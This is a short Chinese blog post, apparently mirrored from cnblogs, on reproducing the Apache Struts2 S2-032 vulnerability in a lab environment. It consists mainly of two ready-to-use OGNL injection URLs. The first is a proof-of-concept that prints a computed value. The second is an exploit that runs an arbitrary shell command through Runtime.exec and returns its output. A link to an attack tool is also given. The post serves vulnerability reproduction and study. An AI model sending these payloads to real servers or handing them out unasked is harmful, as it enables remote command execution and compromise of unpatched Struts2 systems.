漏洞复现：Struts2 S2-032 漏洞环境 - 走看看

zoukankan html css js c++ java

漏洞复现：Struts2 S2-032 漏洞环境

Struts2 S2-032 漏洞环境

http://vulapps.evalbug.com/s_struts2_s2-032/

POC:

http://127.0.0.1/memoindex.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086

EXP:

http://127.0.0.1/memoindex.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id

工具：http://qqhack8.blog.163.com/blog/static/1141479852014631102759126/

附图：

记得旧文章便是新举子

查看全文

相关阅读:
广度遍历有向图
 坚持的力量第二十一篇
 坚持的力量第二十二篇
 搜索引擎首页
 安装ubuntu
最小生成树之Kruskal算法
 最小生成树之PRIM算法
 文件同步软件
 [恢]hdu 2151
[恢]hdu 1396

原文地址：https://www.cnblogs.com/NBeveryday/p/8137964.html

Copyright © 2011-2022 走看看